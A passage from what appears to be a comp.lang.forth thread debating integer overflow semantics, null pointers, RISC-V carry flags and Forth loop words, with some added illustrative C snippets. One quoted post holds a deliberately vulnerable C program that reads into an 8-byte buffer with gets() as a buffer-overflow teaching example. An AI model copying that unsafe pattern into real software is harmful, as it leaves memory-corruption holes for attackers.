    something like throwing an ArrayIndexOutOfBoundsException.
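In C terms, the check Java performs there amounts to comparing the index against a length kept alongside the array before touching memory. A minimal sketch, using a hypothetical `checked_array` type (not any real library's API); instead of throwing, it reports the error through the return value.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical array type that carries its own length. */
typedef struct {
    double *data;
    size_t  len;
} checked_array;

/* Stores v at index i only if i is in bounds; returns false otherwise,
   instead of clobbering memory past the end or wrapping the index. */
static bool checked_store(checked_array a, size_t i, double v)
{
    if (i >= a.len)
        return false;          /* signal the error to the caller */
    a.data[i] = v;
    return true;
}
```

With a 50-element array, storing to index 60 returns false and leaves the surrounding memory untouched.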

    So the implementation might clobber 10 elements past the
    end of the array (bad), or it can signal an error (the only thing that
    makes sense), or in a feat of Java-like brilliance it might alias x[60]
    to x[10] since 60 is 10 mod 50.

    Java does not do that. What do you hope to gain by putting up straw
    men?

    Java defines the basic types int and long to perform wraparound on
    overflow,

    Yes, a mistake IMHO.

    You just have no arguments but "It's wrong!" and straw men to back up
    your opinion.

    - anton
  • From Paul Rubin@21:1/5 to Anton Ertl on Sun Mar 10 01:56:08 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    2+2=5 is also deterministic yet wrong.
    In Java 2+2 gives 4. What do you hope to gain by putting up straw men?

    2+2=5 is obviously wrong and Java doesn't go quite that far. Java
    instead insists that you can add two positive integers and get a
    negative one. That's wrong the same way that 2+2=5 is. It just doesn't
    mess up actual programs as often, because the numbers involved are
    bigger.

    You just have no arguments but "It's wrong!" and straw men to back up
    your opinion.

    In what world can it be right for n to be a positive integer and n+1 to
    be a negative integer? That's not how integers work.

    Tony Hoare in 2009 said about null pointers:

    I call it my billion-dollar mistake. It was the invention of the
    null reference in 1965. At that time, I was designing the first
    comprehensive type system for references in an object oriented
    language (ALGOL W). My goal was to ensure that all use of references
    should be absolutely safe, with checking performed automatically by
    the compiler. But I couldn't resist the temptation to put in a null
    reference, simply because it was so easy to implement. This has led
    to innumerable errors, vulnerabilities, and system crashes, which
    have probably caused a billion dollars of pain and damage in the
    last forty years.

    That is, C and other such languages have null pointers because they corresponded so conveniently to machine operations that the language
    designers couldn't resist including them. Java-style wraparound
    arithmetic is more of the same. A bug magnet, but irresistibly
    convenient for the implementers because of its isomorphism to machine arithmetic.

    Java also has null pointers, another possible mistake. Ada doesn't have
    them, nor does Python etc. C++ has them because of its C heritage and
    the need to support legacy code, but I believe that in "modern" C++
    style you're supposed to use references instead of pointers, so you
    can't have a null or uninitialized one.

  • From Paul Rubin@21:1/5 to Hans Bezemer on Sun Mar 10 13:03:04 2024
    Hans Bezemer <the.beez.speaks@gmail.com> writes:
    Any number representation has its problems - since there is no way to properly represent infinite precision.

    That's exactly the idea here. If the computer runs out of memory in a
    bignum system, that is unquestionably an error condition. In a low
    level system where the representation limit is fitting in a machine word
    rather than having the whole computer memory available, the same error condition occurs if the machine word doesn't have enough bits.

    Exclamations like "BUT IT'S WRONG" may be correct, but without a true alternative it's not gonna change much.

    The true alternative is to treat overflow as an error condition, as
    Ada does, and as languages with bignums do, and as even C does (C at
    least permits the implementation to do the right thing, although it
    doesn't require it to).

    It depends a lot on how error checking is handled. You could return it
    like "errno" or perror(). You could throw an exception. You could
    return some special value - like a NULL pointer.

    You could also use something like std::optional so that static analysis
    can notify you if you don't handle the error case. Haskell in principle
    does even better, letting type inference determine the error handling
    strategy:

    https://blogs.perl.org/users/ovid/2010/08/what-to-know-before-debating-type-systems.html

    See the section "Fallacy: Static types imply longer code".

    std::ofstream file("example.txt");
    if (!file.is_open()) {

    I have the impression that this is legacy design leaking through, but
    I'm not a C++ expert by any means. See also the term "boolean blindness".

    I mean, NULL is already a macro, it shouldn't be difficult to
    gravitate to a better value.

    The trouble is that the pointer datatype doesn't distinguish NULL from
    valid addresses. A static analyzer could have an internal database of functions whose return values should be checked against NULL, but it's
    better to make it explicit in the datatype.
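C has no std::optional, but the idea of putting the "no result" case into the datatype can be sketched with a struct that pairs a found flag with the value. The names `lookup_result` and `find_index` are hypothetical. Unlike std::optional with static analysis, or Haskell's Maybe, C cannot force the caller to check `found`, but at least the "missing" case no longer masquerades as a valid value the way NULL does.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical result type: absence of a value is part of the type. */
typedef struct {
    bool   found;
    size_t index;     /* meaningful only when found is true */
} lookup_result;

/* Linear search for key in names[0..n-1]. */
static lookup_result find_index(const char *const *names, size_t n,
                                const char *key)
{
    for (size_t i = 0; i < n; i++)
        if (strcmp(names[i], key) == 0)
            return (lookup_result){ true, i };
    return (lookup_result){ false, 0 };
}
```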

  • From albert@spenarnc.xs4all.nl@21:1/5 to Anton Ertl on Mon Mar 11 11:15:56 2024
    In article <2024Mar10.092913@mips.complang.tuwien.ac.at>,
    Anton Ertl <anton@mips.complang.tuwien.ac.at> wrote:
    Paul Rubin <no.email@nospam.invalid> writes:
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    If implemented well, the slowdown is small in the common case (small
    integers): E.g., on AMD64 an add, sub, or imul instruction just needs
    to be followed by a jo which in the usual case is not taken and very
    predictable.

    It might be worse for RISC V.

    It is. That's a failure of RISC-V.

    As far as I can tell it was a design choice for DEC Alpha and RISC-V. Apparently flags are detrimental to parallelism.

    You can't call that a failure because you don't like it.


    Groetjes Albert
  • From Anton Ertl@21:1/5 to albert@spenarnc.xs4all.nl on Mon Mar 11 17:40:20 2024
    albert@spenarnc.xs4all.nl writes:
    In article <2024Mar10.092913@mips.complang.tuwien.ac.at>,
    Anton Ertl <anton@mips.complang.tuwien.ac.at> wrote:
    Paul Rubin <no.email@nospam.invalid> writes:
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    If implemented well, the slowdown is small in the common case (small
    integers): E.g., on AMD64 an add, sub, or imul instruction just needs
    to be followed by a jo which in the usual case is not taken and very
    predictable.

    It might be worse for RISC V.

    It is. That's a failure of RISC-V.

    As far as I can tell it was a design choice for DEC Alpha and RISC-V.

    And MIPS.

    Apparently flags are detrimental to parallelism.

    Reality check: No MIPS, Alpha, or RISC-V ever has had as much
    instruction-level parallelism as contemporaneous CPUs for
    architectures with flags, so flags are obviously not detrimental to instruction-level parallelism.

    Look at
    <http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps>: The
    dashed orange line near the bottom is U74, a RISC-V implementation.
    The other lines are all for CPU cores with flags.

    If you want to do several parallel multi-precision additions, say, if
    you want a multi-precision addition a+b+c+d, having one (ARM A64) or
    two (AMD64 with ADX) carry flags does indeed limit the parallelism,
    but the MIPS/Alpha/RISC-V answer is to replace one ADCX/ADOX
    instruction (one cycle latency) with five instructions with typically
    three cycles of latency.

    On AMD64 with ADX, a 6400-bit addition of a+b+c+d can be split into
    two chains: t=a+b+c and t+d; this has a total latency of about 200
    cycles (actually OoO execution can reduce this somewhat by overlapping
    the two chains to a certain extent), while the MIPS/Alpha/RISC-V
    approach takes 300 cycles of latency with no chance of additional
    overlap within that computation.
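For readers who have not seen the flagless approach, here is a portable C sketch of multi-precision addition written the way it must be done without a carry flag: the carry out of each limb is recomputed with unsigned comparisons. On RISC-V each limb would plausibly compile to add, sltu, add, sltu, or (an assumption about typical compiler output, not a measurement), and only the last three depend on the incoming carry, which would match the five instructions and three cycles of carry-chain latency mentioned above.

```c
#include <stddef.h>
#include <stdint.h>

/* r = a + b over n little-endian 64-bit limbs; returns the final carry.
   No carry flag is used: each carry is derived from unsigned compares. */
static uint64_t mp_add(uint64_t *r, const uint64_t *a, const uint64_t *b,
                       size_t n)
{
    uint64_t carry = 0;
    for (size_t i = 0; i < n; i++) {
        uint64_t s  = a[i] + b[i];   /* add                               */
        uint64_t c1 = s < a[i];      /* sltu: carry out of a+b            */
        uint64_t t  = s + carry;     /* add: on the carry chain           */
        uint64_t c2 = t < s;         /* sltu: carry out of +carry (chain) */
        r[i]  = t;
        carry = c1 | c2;             /* or: at most one is set (chain)    */
    }
    return carry;
}
```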

    You will need >6 parallel multi-precision additions before the two
    carry flags of AMD64 with ADX are theoretically more limiting than the MIPS/Alpha/RISC-V approach. And to be practically more limiting, the
    RISC-V implementation needs to be extremely wide (>36 instructions per
    cycle) and the precision must be extremely high (to eliminate overlap
    between chains as an issue).

    You can't call that a failure because you don't like it.

    The correct English term is that it's the *fault* of RISC-V. They
    took a deliberate decision to need more instructions for implementing
    overflow checks than other architectures, so it's their
    responsibility, and for those who want to use big integers (or who
    want to trap on signed overflow), their fault.

    For an alternative to the RISC-V approach that is not as limiting as
    the ARM A64 and AMD64 approaches, read:

    http://www.complang.tuwien.ac.at/anton/tmp/carry.pdf

    (not published yet)

    - anton
  • From mhx@21:1/5 to All on Mon Mar 11 18:50:36 2024
    No / not yet?
    "The requested URL /anton/tmp/opt-ipc-uarch.eps : was not found on this server."

  • From Anton Ertl@21:1/5 to Anton Ertl on Mon Mar 11 20:53:54 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    You will need >6 parallel multi-precision additions before the two
    carry flags of AMD64 with ADX are theoretically more limiting than the MIPS/Alpha/RISC-V approach. And to be practically more limiting, the
    RISC-V implementation needs to be extremely wide (>36 instructions per
    cycle) and the precision must be extremely high (to eliminate overlap
    between chains as an issue).

    Correction: For performing >6 parallel multi-precision additions at a
    rate of >6 steps every 3 cycles, >36 instructions are needed only
    every 3 cycles with the MIPS/Alpha/RISC-V approach, i.e. >12 instructions/cycle.

    - anton
  • From Anton Ertl@21:1/5 to mhx on Mon Mar 11 20:51:46 2024
    mhx@iae.nl (mhx) writes:
    No / not yet?
    "The requested URL /anton/tmp/opt-ipc-uarch.eps : was not found on this server."

    Works for me:

    wget http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps
    --2024-03-11 21:49:20-- http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps
    Resolving www.complang.tuwien.ac.at (www.complang.tuwien.ac.at)... 128.130.173.64
    Connecting to www.complang.tuwien.ac.at (www.complang.tuwien.ac.at)|128.130.173.64|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 2255987 (2.2M) [application/postscript]
    Saving to: ‘opt-ipc-uarch.eps’

    opt-ipc-uarch.eps 100%[===================>] 2.15M 8.38MB/s in 0.3s

    - anton
  • From Anton Ertl@21:1/5 to Paul Rubin on Mon Mar 11 21:08:43 2024
    Paul Rubin <no.email@nospam.invalid> writes:
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    2+2=5 is also deterministic yet wrong.
    In Java 2+2 gives 4. What do you hope to gain by putting up straw men?

    2+2=5 is obviously wrong and Java doesn't go quite that far. Java
    instead insists that you can add two positive integers and get a
    negative one. That's wrong the same way that 2+2=5 is.

    Not at all. Modular arithmetic is not arithmetic in Z, but it's a
    commutative ring and has the nice properties of this algebraic
    structure.

    It just doesn't
    mess up actual programs as often, because the numbers involved are
    bigger.

    If you use members of that ring as if they were members of Z, you will sometimes get an unintended result; but even that works surprisingly
    well, so well that the RISC-V designers have not seen a need to
    include an efficient way to detect those cases where the result
    deviates from that in Z. Still, the nice algebraic properties of
    modular arithmetic can be of benefit even in such cases:

    9223372036854775807 1 + dup cr . 2 - cr .

    prints

    -9223372036854775808
    9223372036854775806 ok

    in Gforth on a 64-bit machine.
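The same computation in C has to go through unsigned arithmetic, because signed overflow is undefined behaviour in C while unsigned arithmetic is defined to be modular. A minimal sketch; converting the out-of-range unsigned result back to int64_t is implementation-defined, and the comment assumes GCC or Clang, which reduce it modulo 2^64.

```c
#include <stdint.h>

/* Two's-complement wraparound add for int64_t without signed-overflow UB.
   The final conversion is implementation-defined; GCC and Clang wrap. */
static int64_t wrap_add(int64_t a, int64_t b)
{
    return (int64_t)((uint64_t)a + (uint64_t)b);
}
```

Here `wrap_add(INT64_MAX, 1)` gives INT64_MIN (-9223372036854775808), and adding -2 to that gives INT64_MAX - 1 (9223372036854775806), the same two lines Gforth prints.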

    In what world can it be right for n to be a positive integer and n+1 to
    be a negative integer? That's not how integers work.

    It's how Java's int and long types work. And if you want something
    closer to Z, Java also has BigInteger.

    Tony Hoare in 2009 said about null pointers:

    And the relevance is?

    Java-style wraparound
    arithmetic is more of the same. A bug magnet,

    Unsupported claim. Interestingly, I remember only one case where I
    saw an unintended result due to modular arithmetic in a programming
    language. It happened when I computed with performance counter
    results in bash. bash still works that way:

    [~:147654] A=9223372036854775807
    [~:147655] echo $[A+1]
    -9223372036854775808

    I think I saw the unintended result on a 32-bit machine, because
    performance counter results typically do not exceed 2^48, definitely
    not 2^63-1.

    Java also has null pointers, another possible mistake. Ada doesn't have them,

    Ada certainly has null.

    C++ has them because of its C heritage and
    the need to support legacy code, but I believe that in "modern" C++
    style you're supposed to use references instead of pointers, so you
    can't have a null or uninitialized one.

    I don't know much about C++, but I would be surprised if they had
    given up on uninitialized data. And an uninitialized reference is
    certainly not better than a null reference.

    Null pointers are at least a little bit more on-topic in this thread
    than integer overflow. In Java one can write, say, a linked list or a
    tree in an object-oriented manner, with, e.g., a tree node being an
    abstract class that has two concrete subclasses: inner node, and empty
    node. No null pointers in sight, right? Wrong: When an inner node is
    created, the constructor of the node first sees a data structure where
    all bytes have been initialized to 0, in order to guarantee memory
    safety; for the references to the child nodes, this means that at that
    point they are null pointers. Only then can the Java code in the
    constructor overwrite them with whatever proper value they get. Is it
    a problem? Not if they only exist there.

    The fact that Java idiomatics is to implement trees and linked lists
    not in the object-oriented way I outlined above, but in an imperative
    way with null pointers instead of empty nodes could be more
    problematic, but is it a major problem? Not in my (limited)
    experience.

    - anton
  • From Paul Rubin@21:1/5 to Anton Ertl on Mon Mar 11 19:20:08 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    wget http://www.complang.tuwien.ac.at/anton/tmp/opt-ipc-uarch.eps

    It worked for me too (in a browser). The Golden Cove figures are
    impressive. I believe there are some RISC-V implementations with OOO by
    now though.

    The article about carry bits is interesting, though besides bignums one
    should also consider the cost of (desirable) routine overflow trapping
    of integer arithmetic, which is currently not done much. Maybe
    benchmarking C programs compiled with and without -ftrapv would be a
    useful addition.

  • From Paul Rubin@21:1/5 to Anton Ertl on Mon Mar 11 20:07:01 2024
    anton@mips.complang.tuwien.ac.at (Anton Ertl) writes:
    Not at all. Modular arithmetic is not arithmetic in Z, but it's a commutative ring and has the nice properties of this algebraic
    structure.

    Right, those modular values aren't integers, they are equivalence
    classes of integers. The ring Z/NZ might have some nice properties
    but they aren't the properties of integers.

    but even that works surprisingly well, so well that the RISC-V
    designers have not seen a need to include an efficient way to detect
    those cases where the result deviates from that in Z.

    Sure, C worked pretty well in the 1980s but we've seen how well that
    worked out. RISC-V perpetuates the bugs of the 1980s instead of taking
    the opportunity to fix them.

    Still, the nice algebraic properties of modular arithmetic can be of
    benefit even in such cases.... 64 bit machine

    Another thing, if I run the same integer calculation on two machines, at
    least programmed in a HLL, I should expect the same result on both. But
    if the word sizes are different then the results will be different. (If
    one or both crash due to implementation restrictions such as machine
    overflow, that's annoying, but it's better than getting wrong answers).

    In what world can it be right for n to be a positive integer and n+1 to
    be a negative integer? That's not how integers work.
    It's how Java's int and long types work.

    Yes, that's a mistake. I just don't see how it can be anything else.
    2+2=5 would be obviously wrong, but it's hypothetical, or as you say, a
    straw man. 20+20=50 or 2000+2000=5000 or 200000+200000=500000 would
    also be straw men, since they don't happen either. What about 2000000000+2000000000=-294967296? Java actually does that, it can't be
    called a straw man, so instead I'm supposed to believe that it's a valid result. I just can't.
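The example can be reproduced in C with fixed-width types, which also illustrates the earlier point that the same sum gives different answers at different word sizes. A sketch assuming GCC or Clang (for `__builtin_add_overflow` and for the wrapping conversion to int32_t): `sum32_wrapping` mirrors Java's int, while `sum32_checked` reports the overflow instead of returning a wrapped value.

```c
#include <stdbool.h>
#include <stdint.h>

/* Java-style int addition: wraps modulo 2^32 (the conversion back to
   int32_t is implementation-defined in C; GCC and Clang wrap). */
static int32_t sum32_wrapping(int32_t a, int32_t b)
{
    return (int32_t)((uint32_t)a + (uint32_t)b);
}

/* Checked addition: returns false instead of producing a wrapped result. */
static bool sum32_checked(int32_t a, int32_t b, int32_t *out)
{
    return !__builtin_add_overflow(a, b, out);
}
```

With 32-bit words, 2000000000+2000000000 wraps to -294967296 (that is, 4000000000 - 2^32), whereas the same sum in 64-bit arithmetic is 4000000000.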

    And if you want something closer to Z, Java also has BigInteger.

    Those are boxed and expensive for the usual case where the results are
    expected to fit into the machine word. Of course that expectation may
    be wrong (say due to a program bug), but in that case I want the program
    to crash, like it would for an out-of-range subscript.

    Maybe it is a mistake for Java to have an int type like that at all,
    i.e. BigInteger should be the default, like in Python. It was a design
    choice to make machine arithmetic more accessible to gain acceptance by
    some potential users. Guy Steele famously said "We were after the C++ programmers. We managed to drag a lot of them about halfway to Lisp."
    Java today seems awfully old-fashioned of course.

    Tony Hoare in 2009 said about null pointers:
    And the relevance is?

    Both are instances where adding a "feature" for implementation
    convenience turned out to attract bugs and vulnerabilities.

    Java-style wraparound arithmetic is more of the same. A bug magnet,
    Unsupported claim.

    It's supported by that page linked a few days ago, about overflow bugs
    in real programs.

    I think I saw the unintended result on a 32-bit machine

    I agree that it's less likely to be a problem if the ints are 64 bits.
    And of course it was a frequent occurrence in the 16 bit era.

    Note that at least in gcc on x64, ints by default are still 32 bits
    (longs are 32 bits too under the Windows x64 ABI, though 64 bits under
    Linux). These days when I write C code I tend to use stdint.h and specify
    int sizes explicitly, e.g. int64_t or int32_t rather than int or long or whatever.

    I don't know much about C++, but I would be surprised if they had
    given up on uninitialized data. And an uninitialized reference is
    certainly not better than a null reference.

    I don't know a way to make an uninitialized reference in C++ but maybe
    it's possible. If you just say "int &y;" you get a compile time error.

    The fact that Java idiomatics is to implement trees and linked lists
    not in the object-oriented way I outlined above

    The OO description is similar to using a sum type, and it's reasonable
    for the implementation under the covers to use a zero pointer to
    represent an empty list. Some Lisp implementations went even further and
    used "cdr coding", which means using a single bit to indicate that the
    next list node is at the next word in memory, so the "next" pointer
    (cdr) can be eliminated. You might allocate the list nodes
    non-consecutively when the list is created, but a compacting GC can
    later make the elements consecutive in memory and get rid of the pointer overhead.

  • From albert@spenarnc.xs4all.nl@21:1/5 to Anton Ertl on Tue Mar 12 09:48:18 2024
    In article <2024Mar11.220843@mips.complang.tuwien.ac.at>,
    Anton Ertl <anton@mips.complang.tuwien.ac.at> wrote:
    Paul Rubin <no.email@nospam.invalid> writes:
    <SNIP>
    Java also has null pointers, another possible mistake. Ada doesn't have them,

    Ada certainly has null.

    C++ has them because of its C heritage and
    the need to support legacy code, but I believe that in "modern" C++
    style you're supposed to use references instead of pointers, so you
    can't have a null or uninitialized one.

    I don't know much about C++, but I would be surprised if they had
    given up on uninitialized data. And an uninitialized reference is
    certainly not better than a null reference.

    I can't see the problem with null pointers. Algol68 had an explicit
    `nil' that serves the same purpose. Any reference is initialized with
    `nil'. If you try to dereference it, meaning trying to fetch or otherwise
    use the referred object this meets with a run time error.
    That is probably the clean and expensive way.
    So nil + reference takes the same place as NULL + pointer in c.

    I try to emulate this in ciforth. Looking up a word in the dictionary
    results in an entry (struct with fields for properties) or a null pointer,
    i.e. zero. You are supposed to test for this case, but if you fail
    you get a "Segmentation fault".
    As far as Forth goes, that is pretty satisfactory security.

    <SNIP>

    - anton

    Groetjes Albert
  • From albert@spenarnc.xs4all.nl@21:1/5 to Anton Ertl on Tue Mar 12 10:13:19 2024
    In article <2024Mar2.090401@mips.complang.tuwien.ac.at>,
    Anton Ertl <anton@mips.complang.tuwien.ac.at> wrote:
    Krishna Myneni <krishna.myneni@ccreweb.org> writes:
    #include <stdio.h>
    #include <stdlib.h>

    void MaliciousCode() {
        printf("This code is malicious!\n");
        printf("It will not execute normally.\n");
        exit(0);
    }

    void GetInput() {
        char buffer[8];
        gets(buffer);
        // puts(buffer);
    }

    int main() {
        GetInput();
        return 0;
    }
    === end code ===

    It will be a useful exercise to work up a similar example in Forth, as a step to thinking about automatic hardening techniques (as opposed to
    input sanitization).

    Forth does not have an inherently unbounded input word like C's
    gets(). And even typical C environments warn you when you compile
    this code; e.g., when I compile it on Debian 11, I get:

    gcc xxx.c
    |xxx.c: In function ‘GetInput’:
    |xxx.c:12:10: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
    | 12 | gets(buffer);
    | | ^~~~
    | | fgets
    |/usr/bin/ld: /tmp/ccC9Qbu7.o: in function `GetInput':
    |xxx.c:(.text+0x3b): warning: the `gets' function is dangerous and should not be used.

    So, they removed gets() from stdio.h, and added a warning to the
    linker. "man gets" tells me:

    |_Never use this function_
    |[...]
    |ISO C11 removes the specification of gets() from the C language, and
    |since version 2.16, glibc header files don't expose the function
    |declaration if the _ISOC11_SOURCE feature test macro is defined.
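The replacement the compiler suggests is fgets(), which takes the buffer size. A minimal sketch of a bounded GetInput; the FILE * parameter (instead of reading stdin directly), the bool return value, and the newline stripping are additions for illustration.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Bounded replacement for gets(): reads at most size-1 characters
   (size must be at least 1), always NUL-terminates, and strips a
   trailing newline if one was read. */
static bool get_input(FILE *in, char *buffer, size_t size)
{
    if (fgets(buffer, (int)size, in) == NULL)
        return false;                     /* EOF or read error */
    buffer[strcspn(buffer, "\n")] = '\0';
    return true;
}
```

An overlong line is truncated to what fits in the 8-byte buffer instead of overwriting the stack.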

    Ironically, in ciforth I implemented (ACCEPT). That has the
    functionality of gets(). However it returns (addr length) and
    identifies a part of the input buffer. So you can never
    overwrite anything, because it doesn't write anything.
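The (addr length) design described here, pointing into an existing input buffer instead of copying into a caller-supplied one, can be sketched in C as a function that returns a span. The names `span` and `next_line` are hypothetical, and this is not ciforth's code.

```c
#include <stddef.h>
#include <string.h>

/* An (addr length) pair referring into memory owned by someone else. */
typedef struct {
    const char *addr;
    size_t      len;
} span;

/* Returns the next line of buf[*pos..len) without copying or writing it,
   and advances *pos past the newline. Requires *pos <= len. */
static span next_line(const char *buf, size_t len, size_t *pos)
{
    size_t start = *pos;
    const char *nl = memchr(buf + start, '\n', len - start);
    size_t end = nl ? (size_t)(nl - buf) : len;
    *pos = nl ? end + 1 : len;
    return (span){ buf + start, end - start };
}
```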

    <SNIP>

    - anton

    Groetjes Albert
  • From Anton Ertl@21:1/5 to Hans Bezemer on Wed Mar 13 07:20:34 2024
    Hans Bezemer <the.beez.speaks@gmail.com> writes:
    In a perfect world I'd have a word:
    - That puts *three* parameters on the stack: limit, start and step;
    - That evaluates these three parameters and leaves a flag
    - That takes this flag and skips the loop if zero.

    Let's call the word that initializes these actions "+DO". +DO equals (
    limit index step -- R: limit index step)

    A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
    stack effect

    MEM+DO ( addr ubytes +nstride -- R:loop-sys )
    MEM-DO ( addr ubytes +nstride -- R:loop-sys )

    which is paired with LOOP. Both produce the same addresses (if ubytes
    is a multiple of +nstride), but MEM-DO in reverse order.
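The address sequences described for MEM+DO and MEM-DO can be illustrated with ordinary C loops over byte offsets. This is only an analogue of the described behaviour, assuming ubytes is a multiple of the stride, and not Gforth's implementation. The helper names and the "record offsets into an array" interface are hypothetical.

```c
#include <stddef.h>

/* Records the offsets MEM+DO ... LOOP would visit (0, stride, 2*stride,
   ... below ubytes) into out[0..cap-1]; stride must be > 0.
   Returns the number of offsets recorded. */
static size_t mem_up(size_t ubytes, size_t stride, size_t *out, size_t cap)
{
    size_t n = 0;
    for (size_t off = 0; off < ubytes && n < cap; off += stride)
        out[n++] = off;
    return n;
}

/* Same for MEM-DO ... LOOP: the same offsets in reverse order when ubytes
   is a multiple of stride (for other ubytes this sketch may differ from
   Gforth). */
static size_t mem_down(size_t ubytes, size_t stride, size_t *out, size_t cap)
{
    size_t n = 0;
    for (size_t off = ubytes; off >= stride && n < cap; ) {
        off -= stride;
        out[n++] = off;
    }
    return n;
}
```

A zero-length range visits nothing in either direction, which is the memory-safe outcome one wants for an empty buffer.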

    One could add a BOUNDS+DO that works like your +DO, but I would first
    have to see if it is needed.

    Concerning the name +DO, this is taken in Gforth since at least
    Gforth-0.2 (1996) for entering a loop only if index<limit (signed
    comparison), without providing a stride.

    Compare: https://rosettacode.org/wiki/Loops/Wrong_ranges#uBasic/4tH
    To the rather weak: https://rosettacode.org/wiki/Loops/Wrong_ranges#Forth

    Note that 4tH behaves differently here. It catches most of the exceptional situations:

    start: -2 stop: 2 inc: 1 | -2 -1 0 1
    start: -2 stop: 2 inc: 0 | -2
    start: -2 stop: 2 inc: -1 | -2
    start: -2 stop: 2 inc: 10 | -2
    start: 2 stop: -2 inc: 1 | 2
    start: 2 stop: 2 inc: 1 | 2
    start: 2 stop: 2 inc: -1 | 2
    start: 2 stop: 2 inc: 0 | 2
    start: 0 stop: 0 inc: 0 | 0

    Versus:

    Some of these loop infinitely, and some under/overflow, so for the sake
    of brevity long outputs will be truncated by ....

    start: -2 stop: 2 inc: 1 | -2 -1 0 1
    start: -2 stop: 2 inc: 0 | -2 -2 -2 -2 -2 ...
    start: -2 stop: 2 inc: -1 | -2 -3 -4 -5 ... 5 4 3 2
    start: -2 stop: 2 inc: 10 | -2
    start: 2 stop: -2 inc: 1 | 2 3 4 5 ... -6 -5 -4 -3
    start: 2 stop: 2 inc: 1 | 2 3 4 5 ... -2 -1 0 1
    start: 2 stop: 2 inc: -1 | 2
    start: 2 stop: 2 inc: 0 | 2 2 2 2 2 ...
    start: 0 stop: 0 inc: 0 | 0 0 0 0 0 ...

    I still don't think 4tH's performance is perfect, but it's a tradeoff
    between compatibility and intuitive behavior.

    You showed the DO version in Forth, which is indeed rather weak for
    the practically occurring index=limit case. For that we have ?DO,
    which shows:

    start: -2 stop: 2 inc: 1 | -2 -1 0 1
    start: -2 stop: 2 inc: 0 | -2 -2 -2 -2 -2 ...
    start: -2 stop: 2 inc: -1 | -2 -3 -4 -5 ... 5 4 3 2
    start: -2 stop: 2 inc: 10 | -2
    start: 2 stop: -2 inc: 1 | 2 3 4 5 ... -6 -5 -4 -3
    start: 2 stop: 2 inc: 1 |
    start: 2 stop: 2 inc: -1 |
    start: 2 stop: 2 inc: 0 |
    start: 0 stop: 0 inc: 0 |

    The 0 +LOOP case (second line) does not occur in practice. I
    recommend not using

    ?DO ... -1 +LOOP

    because the behaviour of ?DO is not consistent with that of -1 +LOOP
    when index=limit. The rosettacode tests don't show this inconsistency
    clearly, though. Gforth has

    -DO ... 1 -LOOP

    for decrementing in each step by 1, but it seems to me that the
    rosettacode task is intended to use the same counted-loop construct
    for both cases. If you, say, write

    2 -2 +DO ... -1 +LOOP

    You will get the same result as in the third line, but you asked for
    it.
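    The inconsistency shows up clearly when counting iterations. This
    sketch uses only standard words; COUNT-DOWN is a hypothetical name.
    Starting above the limit, ?DO ... -1 +LOOP runs down to and including
    the limit (start-limit+1 iterations), so by that pattern start=limit
    should give one iteration, but ?DO skips the loop instead.

```forth
\ Count how often the body of "?DO ... -1 +LOOP" runs.
: count-down ( limit start -- n )
  0 rot rot                \ ( 0 limit start ): counter below the loop params
  ?do  1+  -1 +loop ;
```

    With limit 0, starts 3 and 1 give 4 and 2 iterations, but start 0
    gives 0 rather than 1.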

    For the fifth line, if you use

    -2 2 +DO ... 1 +LOOP

    the result is that the loop is not entered.

    Overall, for

    : test-seq ( start stop inc -- )
    cr rot dup ." start: " 2 .r
    rot dup ." stop: " 2 .r
    rot dup ." inc: " 2 .r ." | "
    -rot swap +do i . dup +loop drop ;
    -2 2 1 test-seq
    -2 2 0 test-seq
    -2 2 -1 test-seq
    -2 2 10 test-seq
    2 -2 1 test-seq
    2 2 1 test-seq
    2 2 -1 test-seq
    2 2 0 test-seq
    0 0 0 test-seq

    the output is:

    start: -2 stop: 2 inc: 1 | -2 -1 0 1 ok
    start: -2 stop: 2 inc: 0 | -2 -2 -2 -2 -2 ...
    start: -2 stop: 2 inc: -1 | -2 -3 -4 -5 ... 5 4 3 2 ok
    start: -2 stop: 2 inc: 10 | -2 ok
    start: 2 stop: -2 inc: 1 | ok
    start: 2 stop: 2 inc: 1 | ok
    start: 2 stop: 2 inc: -1 | ok
    start: 2 stop: 2 inc: 0 | ok
    start: 0 stop: 0 inc: 0 | ok

    The same as the ?DO variant except for the "start: 2 stop: -2 inc: 1"
    case.

    I don't consider performing one iteration if index=limit good
    behaviour.

    - anton
    --
    M. Anton Ertl http://www.complang.tuwien.ac.at/anton/home.html
    comp.lang.forth FAQs: http://www.complang.tuwien.ac.at/forth/faq/toc.html
    New standard: https://forth-standard.org/
    EuroForth 2023: https://euro.theforth.net/2023

  • From mhx@21:1/5 to Anton Ertl on Wed Mar 13 10:00:05 2024
    Anton Ertl wrote:
    [..]
    A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
    stack effect

    MEM+DO ( addr ubytes +nstride -- R:loop-sys )
    MEM-DO ( addr ubytes +nstride -- R:loop-sys )
    [..]

    Interesting! It's always a nuisance when one wants to step backwards.
    Does it work with UNLOOP and does one point at the start of the area
    or at the address of the first item to process?

    -marcel

  • From minforth@21:1/5 to Anton Ertl on Wed Mar 13 09:24:36 2024
    Anton Ertl wrote:
    A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
    stack effect

    MEM+DO ( addr ubytes +nstride -- R:loop-sys )
    MEM-DO ( addr ubytes +nstride -- R:loop-sys )

    which is paired with LOOP. Both produce the same addresses (if ubytes
    is a multiple of +nstride), but MEM-DO in reverse order.

    A very handy addition when working with arrays. I use similar words

    .. NEXT and <FOR .. NEXT \ index N for 1-dim vectors

    .. NEXT and <<FOR .. NEXT \ indices X Y for 2-dim arrays.

    Recently I also added a "runtime control flow stack" to my system to hold
    loop indices. I just hated UNLOOP et al too much. ;-)

